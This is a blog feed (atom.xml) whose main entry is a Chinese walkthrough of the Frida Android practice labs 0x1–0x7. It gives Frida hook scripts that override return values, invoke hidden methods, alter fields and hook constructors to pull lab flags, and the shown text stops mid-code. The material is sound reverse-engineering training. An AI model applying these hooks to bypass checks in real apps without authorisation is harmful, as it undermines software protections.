-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathatom.xml
212 lines (124 loc) · 388 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>花开再美,怎如初见</title>
<link href="https://shenshuoyaoyouguangha.github.io/atom.xml" rel="self"/>
<link href="https://shenshuoyaoyouguangha.github.io/"/>
<updated>2024-07-03T09:56:18.730Z</updated>
<id>https://shenshuoyaoyouguangha.github.io/</id>
<author>
<name>F1nGY3</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>pwn</title>
<link href="https://shenshuoyaoyouguangha.github.io/2024/07/03/pwn/"/>
<id>https://shenshuoyaoyouguangha.github.io/2024/07/03/pwn/</id>
<published>2024-07-03T09:41:45.000Z</published>
<updated>2024-07-03T09:56:18.730Z</updated>
<content type="html"><![CDATA[<h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><p>hello,world!</p>]]></content>
<summary type="html"><h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><p>hello,world!</p>
</summary>
</entry>
<entry>
<title>frida_labs</title>
<link href="https://shenshuoyaoyouguangha.github.io/2024/07/03/frida-labs/"/>
<id>https://shenshuoyaoyouguangha.github.io/2024/07/03/frida-labs/</id>
<published>2024-07-03T08:44:04.000Z</published>
<updated>2024-07-03T08:53:23.977Z</updated>
<content type="html"><![CDATA[<p>[<a href="https://bbs.kanxue.com/thread-280758.htm#msg_header_h3_1">原创]Frida-Hook-Java层操作大全-Android安全-看雪-安全社区|安全招聘|kanxue.com</a></p><p>[<a href="https://bbs.kanxue.com/thread-280812.htm">原创]Frida-Hook-Native层操作大全-Android安全-看雪-安全社区|安全招聘|kanxue.com</a></p><h2 id="Frida-0x1"><a href="#Frida-0x1" class="headerlink" title="Frida 0x1"></a>Frida 0x1</h2><h3 id="修改函数返回值-给函数传自定义参数"><a href="#修改函数返回值-给函数传自定义参数" class="headerlink" title="修改函数返回值&&给函数传自定义参数"></a>修改函数返回值&&给函数传自定义参数</h3><p>程序的主要逻辑是调用一个random的函数,然后对我们的输入进行检测是否是数字,如果是就使用check函数对随机数和我们输入的数进行对比,如果正确则输出flag</p><p><img src="/./assets/image-20240603150155414.png" alt="image-20240603150155414"></p><p>对于hook来讲,可以直接hookr random使其固定返回一个值,活着hook check函数,手动传入值</p><blockquote><ul><li><code>Java.perform</code> 是 Frida 中用于创建一个特殊上下文的函数,让你的脚本能够与 Android 应用程序中的 Java 代码进行交互。它就像是打开了一扇门,让你能够访问并操纵应用程序内部运行的 Java 代码。一旦进入这个上下文,你就可以执行诸如钩取方法或访问 Java 类等操作来控制或观察应用程序的行为。</li><li><code>var <class_reference> = Java.use("<package_name>.<class>");</code><br>在这里,你声明一个变量 <code><class_reference></code> 来表示目标 Android 应用程序中的一个 Java 类。你使用 <code>Java.use</code> 函数指定要使用的类,该函数接受类名作为参数。<code><package_name></code> 表示 Android 应用程序的包名,<code><class></code> 表示你想要与之交互的类。</li><li><code><class_reference>.<method_to_hook>.implementation = function(<args>) {}</code><br>在所选的类内部,通过 <code><class_reference>.<method_to_hook></code> 符号访问你想要钩取的方法。这是你可以定义自己的逻辑以在钩取的方法被调用时执行的地方。<code><args></code> 表示传递给函数的参数。</li></ul></blockquote><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">MainActivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x1.MainActivity"</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-property">get_random</span>.<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br> }<br>}<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook2</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Mainactivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">'com.ad2001.frida0x1.MainActivity'</span>);<br> <span class="hljs-title class_">Mainactivity</span>.<span class="hljs-property">check</span>.<span class="hljs-title function_">overload</span>(<span class="hljs-string">'int'</span>,<span class="hljs-string">'int'</span>).<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params">a,b</span>){<br> a=<span class="hljs-number">0</span>;<br> b=<span class="hljs-number">4</span>;<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"i1 and i2 = "</span>,a,b);<br> <span class="hljs-keyword">return</span> <span class="hljs-variable language_">this</span>.<span class="hljs-title function_">check</span>(a,b);<br> }<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br></code></pre></td></tr></table></figure><span id="more"></span> <h2 id="Frida-0x2"><a href="#Frida-0x2" class="headerlink" title="Frida 0x2"></a>Frida 0x2</h2><h3 id="调用程序未调用的函数"><a href="#调用程序未调用的函数" class="headerlink" title="调用程序未调用的函数"></a>调用程序未调用的函数</h3><p><img src="/./assets/image-20240603191319536.png" alt="image-20240603191319536"></p><p>使用setImmediate的时候可能会hook不到,猜测是hook的截取时间比main的启动时间早了,所以使用settimeout延迟一会hook就能hook到了</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">MainActivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x2.MainActivity"</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-title function_">get_flag</span>(<span class="hljs-number">4919</span>);<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br><br># ffrida -<span class="hljs-variable constant_">UF</span> -l <span class="hljs-number">1.</span>js<br></code></pre></td></tr></table></figure><h2 id="Frida-0x3"><a href="#Frida-0x3" class="headerlink" title="Frida 0x3"></a>Frida 0x3</h2><h3 id="更改类中的静态变量"><a href="#更改类中的静态变量" class="headerlink" title="更改类中的静态变量"></a>更改类中的静态变量</h3><p>类似于如下写法static int code = 0;<br>使用static 修饰的变量则为静态变量。我们可以用如下方法更改静态变量</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br><br><span class="hljs-keyword">var</span> <class_reference> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"<package_name>.<class>"</span>);<br><class_reference>.<variable>.<span class="hljs-property">value</span> = <value>;<br><br>})<br></code></pre></td></tr></table></figure><p><img src="/./assets/image-20240603171040737.png" alt="image-20240603171040737"></p><p><img src="/./assets/image-20240603171055917.png" alt="image-20240603171055917"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x3.Checker"</span>);<br> <span class="hljs-title class_">Checker</span>.<span class="hljs-property">code</span>.<span class="hljs-property">value</span>=<span class="hljs-number">512</span>;<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br><span class="hljs-comment">// setTimeout(main,1000);</span><br></code></pre></td></tr></table></figure><h2 id="Frida-0x4"><a href="#Frida-0x4" class="headerlink" title="Frida 0x4"></a>Frida 0x4</h2><h3 id="调用非MainActivity-非静态方法"><a href="#调用非MainActivity-非静态方法" class="headerlink" title="调用非MainActivity,非静态方法"></a>调用非MainActivity,非静态方法</h3><p>在JAVA代码中,如果创建了一个非静态的类,当我们需要使用这个类的时候需要new一个类的对象出来我们才能使用这个类的功能。类似代码如下:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Check</span> ch = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Check</span>();<br><span class="hljs-title class_">String</span> flag = ch.<span class="hljs-title function_">get_flag</span>(<span class="hljs-number">1337</span>);<br></code></pre></td></tr></table></figure><p>那么在Java源码中需要new出来的实例,我们怎么使用Frida来实现呢?<br>模板如下:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) {<br> <br> <span class="hljs-keyword">var</span> <class_reference> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"<package_name>.<class>"</span>);<br> <span class="hljs-keyword">var</span> <class_instance> = <class_reference>.$new(); <span class="hljs-comment">// Class Object</span><br> <class_instance>.<method>(); <span class="hljs-comment">// 调用方法</span><br> <br>})<br></code></pre></td></tr></table></figure><blockquote><p>静态类和非静态类的区别,非静态类可以被实例化,就像一个结构体一样,而静态类就像函数一样是直接传入值调用的</p></blockquote><p>例子:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-comment">//静态类</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">MathUtilities</span><br>{<br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">Add</span><span class="hljs-params">(<span class="hljs-type">int</span> a, <span class="hljs-type">int</span> b)</span><br> {<br> <span class="hljs-keyword">return</span> a + b;<br> }<br> <br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">Subtract</span><span class="hljs-params">(<span class="hljs-type">int</span> a, <span class="hljs-type">int</span> b)</span><br> {<br> <span class="hljs-keyword">return</span> a - b;<br> }<br>}<br><br><span class="hljs-comment">// 调用静态方法</span><br><span class="hljs-type">int</span> <span class="hljs-variable">sum</span> <span class="hljs-operator">=</span> MathUtilities.Add(<span class="hljs-number">3</span>, <span class="hljs-number">5</span>);<br><span class="hljs-type">int</span> <span class="hljs-variable">difference</span> <span class="hljs-operator">=</span> MathUtilities.Subtract(<span class="hljs-number">10</span>, <span class="hljs-number">4</span>);<br><br><span class="hljs-comment">//非静态类</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Person</span><br>{<br> <span class="hljs-keyword">public</span> string Name { get; set; }<br> <span class="hljs-keyword">public</span> <span class="hljs-type">int</span> Age { get; set; }<br><br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">Introduce</span><span class="hljs-params">()</span><br> {<br> Console.WriteLine($<span class="hljs-string">"Hi, my name is {Name} and I am {Age} years old."</span>);<br> }<br>}<br><br><span class="hljs-comment">// 创建对象</span><br><span class="hljs-type">Person</span> <span class="hljs-variable">person1</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Person</span>();<br>person1.Name = <span class="hljs-string">"Alice"</span>;<br>person1.Age = <span class="hljs-number">30</span>;<br>person1.Introduce(); <span class="hljs-comment">// 输出: Hi, my name is Alice and I am 30 years old.</span><br><br><span class="hljs-type">Person</span> <span class="hljs-variable">person2</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Person</span>();<br>person2.Name = <span class="hljs-string">"Bob"</span>;<br>person2.Age = <span class="hljs-number">25</span>;<br>person2.Introduce(); <span class="hljs-comment">// 输出: Hi, my name is Bob and I am 25 years old.</span><br><br><br></code></pre></td></tr></table></figure><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'hook succse'</span>);<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Check</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x4.Check"</span>);<br> <span class="hljs-keyword">var</span> check_obj = <span class="hljs-title class_">Check</span>.$new();<br> <span class="hljs-keyword">var</span> string = check_obj.<span class="hljs-title function_">get_flag</span>(<span class="hljs-number">1337</span>);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(string)<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br><span class="hljs-comment">// setTimeout(main,1000);</span><br></code></pre></td></tr></table></figure><h2 id="Frida-0x5"><a href="#Frida-0x5" class="headerlink" title="Frida 0x5"></a>Frida 0x5</h2><h3 id="调用MainActivity中的非静态方法-与0x4区分"><a href="#调用MainActivity中的非静态方法-与0x4区分" class="headerlink" title="调用MainActivity中的非静态方法(与0x4区分)"></a>调用MainActivity中的非静态方法(与0x4区分)</h3><p>直接使用Frida创建<code>MainActivity</code>或任何Android组件可能会很棘手,因为Android的生命周期和线程规则。Android组件,如<code>Activity</code>子类,依赖于应用程序上下文进行正确运行。在Frida中,您可能缺少必要的上下文。Android UI组件通常需要具有关联<code>Looper</code>的特定线程。如果涉及UI任务,请确保在具有活动<code>Looper</code>的主线程上执行。活动是较大的Android应用程序生命周期的一部分。创建<code>MainActivity</code>的实例可能需要应用处于特定状态,并且通过Frida管理整个生命周期可能并不直接。总之,为<code>MainActivity</code>创建实例并不是一个好主意。</p><p>那么这里的解决方案是什么呢?</p><p>当Android应用程序启动时,系统会创建<code>MainActivity</code>的一个实例(或AndroidManifest.xml文件中指定的启动器活动)。创建<code>MainActivity</code>实例是Android应用程序生命周期的一部分。因此,我们可以使用frida获取<code>MainActivity</code>的实例,然后调用<code>flag()</code>方法来获取我们的标志。</p><h3 id="在现有实例上调用方法"><a href="#在现有实例上调用方法" class="headerlink" title="在现有实例上调用方法"></a>在现有实例上调用方法</h3><p>在现有实例上调用方法可以很容易地通过Frida完成。为此,我们将使用两个API。</p><ul><li><code>Java.performNow</code>:用于在Java运行时环境中执行代码的函数。</li><li><code>Java.choose</code>:在运行时枚举指定Java类(作为第一个参数提供)的实例。</li></ul><p>模板:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">performNow</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) {<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">choose</span>(<span class="hljs-string">'<包名>.<类名>'</span>, {<br> <span class="hljs-attr">onMatch</span>: <span class="hljs-keyword">function</span>(<span class="hljs-params">instance</span>) {<br> <span class="hljs-comment">// 待办事项</span><br> },<br> <span class="hljs-attr">onComplete</span>: <span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) {}<br> });<br>});<br></code></pre></td></tr></table></figure><p>这里有两个回调函数:</p><ul><li>onMatch<ul><li><code>onMatch</code>回调函数在<code>Java.choose</code>操作期间找到指定类的每个实例时执行。</li><li>这个回调函数接收当前实例作为它的参数。</li><li>您可以在<code>onMatch</code>回调中定义自定义操作,以在每个实例上执行。</li><li><code>function(instance) {}</code>,<code>instance</code>参数表示目标类的每个匹配实例。您可以使用任何其他名称。</li></ul></li><li>onComplete<ul><li><code>onComplete</code>回调在<code>Java.choose</code>操作完成后执行操作或清理任务。此块是可选的,如果您在搜索完成后不需要执行任何特定操作,则可以选择将其留空。</li></ul></li></ul><p><img src="/./assets/image-20240603192751063.png" alt="image-20240603192751063"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">choose</span>(<span class="hljs-string">'com.ad2001.frida0x5.MainActivity'</span>, {<br> <span class="hljs-attr">onMatch</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">MainActivity</span>) {<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-title function_">flag</span>(<span class="hljs-number">1337</span>);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'hook succse'</span>)<br> },<br> <span class="hljs-attr">onComplete</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params"></span>) {}<br> });<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br><span class="hljs-comment">// setTimeout(main,1000);</span><br></code></pre></td></tr></table></figure><p><img src="/./assets/image-20240603193446665.png" alt="image-20240603193446665"></p><h2 id="Frida-0x6"><a href="#Frida-0x6" class="headerlink" title="Frida 0x6"></a>Frida 0x6</h2><h3 id="MainActivity中非静态并且参数为非静态变量方法调用"><a href="#MainActivity中非静态并且参数为非静态变量方法调用" class="headerlink" title="MainActivity中非静态并且参数为非静态变量方法调用"></a>MainActivity中非静态并且参数为非静态变量方法调用</h3><ul><li>创建一个<code>Checker</code>类的实例。</li><li>将<code>num1</code>设置为1234,<code>num2</code>设置为4321。</li><li>获取<code>MainActivity</code>的实例。</li><li>使用实例作为参数调用<code>get_flag</code>方法。</li></ul><p>MainActivity没有调用的一个非静态方法,非静态方法中设置一组非静态变量,这就相当于结合了上面学的两种方法,可以先使用frida 0x3的方法更改类的变量,然后再使用frida 0x5的方式调用mainactivity的非静态方法</p><p><img src="/./assets/image-20240603200154611.png" alt="image-20240603200154611"></p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">choose</span>(<span class="hljs-string">'com.ad2001.frida0x6.MainActivity'</span>,<br> {<br> <span class="hljs-attr">onMatch</span>:<span class="hljs-keyword">function</span> (<span class="hljs-params">MainActivity</span>){<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">'hook succse'</span>);<br><br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">'com.ad2001.frida0x6.Checker'</span>)<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span>_obj = <span class="hljs-title class_">Checker</span>.$new()<br> <span class="hljs-title class_">Checker</span>_obj.<span class="hljs-property">num1</span>.<span class="hljs-property">value</span> = <span class="hljs-number">1234</span>;<br> <span class="hljs-title class_">Checker</span>_obj.<span class="hljs-property">num2</span>.<span class="hljs-property">value</span> = <span class="hljs-number">4321</span>;<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-title class_">Checker</span>_obj.<span class="hljs-property">num1</span>.<span class="hljs-property">value</span>,<span class="hljs-title class_">Checker</span>_obj.<span class="hljs-property">num2</span>.<span class="hljs-property">value</span>);<br> <span class="hljs-title class_">MainActivity</span>.<span class="hljs-title function_">get_flag</span>(<span class="hljs-title class_">Checker</span>_obj);<br> },<br> <span class="hljs-attr">onComplete</span>:<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>){}<br> })<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-title function_">setImmediate</span>(main);<br><span class="hljs-comment">// setTimeout(main,1000);</span><br></code></pre></td></tr></table></figure><h2 id="Frida-0x7"><a href="#Frida-0x7" class="headerlink" title="Frida 0x7"></a>Frida 0x7</h2><h3 id="Hook构造函数"><a href="#Hook构造函数" class="headerlink" title="Hook构造函数"></a>Hook构造函数</h3><p>挂钩构造函数十分简单,与挂钩方法类似。让我为您提供一个模板。</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) {<br> <span class="hljs-keyword">var</span> <class_reference> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"<package_name>.<class>"</span>);<br> <class_reference>.<span class="hljs-property">$init</span>.<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span>(<span class="hljs-params"><args></span>){<br> <br> <span class="hljs-comment">/*</span><br><span class="hljs-comment"> </span><br><span class="hljs-comment"> */</span><br> <br> }<br>});<br></code></pre></td></tr></table></figure><p>构造函数的方法:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">hook</span>(<span class="hljs-params"></span>){<br> <span class="hljs-keyword">var</span> <span class="hljs-title class_">Checker</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">"com.ad2001.frida0x7.Checker"</span>);<br> <span class="hljs-title class_">Checker</span>.<span class="hljs-property">$init</span>.<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params">a,b</span>){<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Origin num"</span>,a,b);<br> <span class="hljs-variable language_">this</span>.$init(<span class="hljs-number">600</span>,<span class="hljs-number">600</span>);<br> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">"Hook Success"</span>);<br> }<br>}<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">main</span>(<span class="hljs-params"></span>){<br> <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>){<br> <span class="hljs-title function_">hook</span>();<br> })<br>}<br><br><span class="hljs-comment">// setImmediate(main);</span><br><span class="hljs-built_in">setTimeout</span>(main,<span class="hljs-number">1000</span>);<br></code></pre></td></tr></table></figure><p>改值的方法:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 